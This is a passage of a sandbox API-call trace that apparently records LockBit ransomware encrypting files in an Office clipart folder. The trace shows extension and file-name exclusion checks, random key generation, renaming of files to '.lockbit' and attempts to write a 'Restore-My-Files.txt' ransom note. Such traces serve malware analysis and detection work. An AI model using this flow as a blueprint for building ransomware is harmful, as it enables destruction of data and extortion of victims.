returned -1 [0110.212] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.212] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.212] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00407_.WMF") returned 1 [0110.213] lstrcmpiW (lpString1="ntldr", lpString2="DD00407_.WMF") returned 1 [0110.213] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00407_.WMF") returned 1 [0110.213] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00407_.WMF") returned -1 [0110.213] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00407_.WMF") returned -1 [0110.213] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00407_.WMF") returned 1 [0110.213] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00407_.WMF") returned 1 [0110.213] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.213] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned=".WMF" [0110.213] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.213] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.213] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.214] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.214] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.lockbit") returned 72 [0110.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.215] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.215] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.215] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7828) returned 1 [0110.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.216] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0110.220] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.220] malloc (_Size=0xa6) returned 0x77d800 [0110.220] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0110.222] free (_Block=0x77d800) [0110.222] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.222] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.222] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.222] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x51d5b650, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00413_.WMF", cAlternateFileName="")) returned 1 [0110.223] lstrcmpiW (lpString1=".", lpString2="DD00413_.WMF") returned -1 [0110.223] lstrcmpiW (lpString1="..", lpString2="DD00413_.WMF") returned -1 [0110.223] PathFindExtensionW (pszPath="DD00413_.WMF") returned=".WMF" [0110.223] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.223] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.223] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00413_.WMF") returned 1 [0110.224] lstrcmpiW (lpString1="ntldr", lpString2="DD00413_.WMF") returned 1 [0110.224] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00413_.WMF") returned 1 [0110.224] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00413_.WMF") returned -1 [0110.224] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00413_.WMF") returned -1 [0110.224] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00413_.WMF") returned 1 [0110.224] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00413_.WMF") returned 1 [0110.224] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.224] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned=".WMF" [0110.224] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.224] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.224] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.225] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.225] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.lockbit") returned 72 [0110.225] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.226] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.227] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.227] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=42992) returned 1 [0110.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.227] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.227] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.228] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.228] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.234] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0110.234] malloc (_Size=0xa6) returned 0x77d800 [0110.234] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0110.234] free (_Block=0x77d800) [0110.234] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0110.234] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0110.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0110.234] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x60714670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xa79c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DD00414_.WMF", cAlternateFileName="")) returned 1 [0110.234] lstrcmpiW (lpString1=".", lpString2="DD00414_.WMF") returned -1 [0110.234] lstrcmpiW (lpString1="..", lpString2="DD00414_.WMF") returned -1 [0110.234] PathFindExtensionW (pszPath="DD00414_.WMF") returned=".WMF" [0110.234] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0110.234] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0110.234] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0110.234] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0110.234] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0110.234] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0110.234] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0110.235] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0110.235] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="DD00414_.WMF") returned 1 [0110.236] lstrcmpiW (lpString1="ntldr", lpString2="DD00414_.WMF") returned 1 [0110.236] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="DD00414_.WMF") returned 1 [0110.236] lstrcmpiW (lpString1="bootsect.bak", lpString2="DD00414_.WMF") returned -1 [0110.236] lstrcmpiW (lpString1="autorun.inf", lpString2="DD00414_.WMF") returned -1 [0110.236] lstrcmpiW (lpString1="thumbs.db", lpString2="DD00414_.WMF") returned 1 [0110.236] lstrcmpiW (lpString1="iconcache.db", lpString2="DD00414_.WMF") returned 1 [0110.236] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0110.236] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF") returned=".WMF" [0110.236] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0110.236] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0110.236] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0110.237] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0110.237] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF.lockbit") returned 72 [0110.237] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0110.238] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0110.238] malloc (_Size=0x40068) returned 0x1ff1e60 [0110.238] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=42908) returned 1 [0110.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.238] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.238] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0110.238] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0110.239] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0110.239] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0110.239] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0110.242] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft 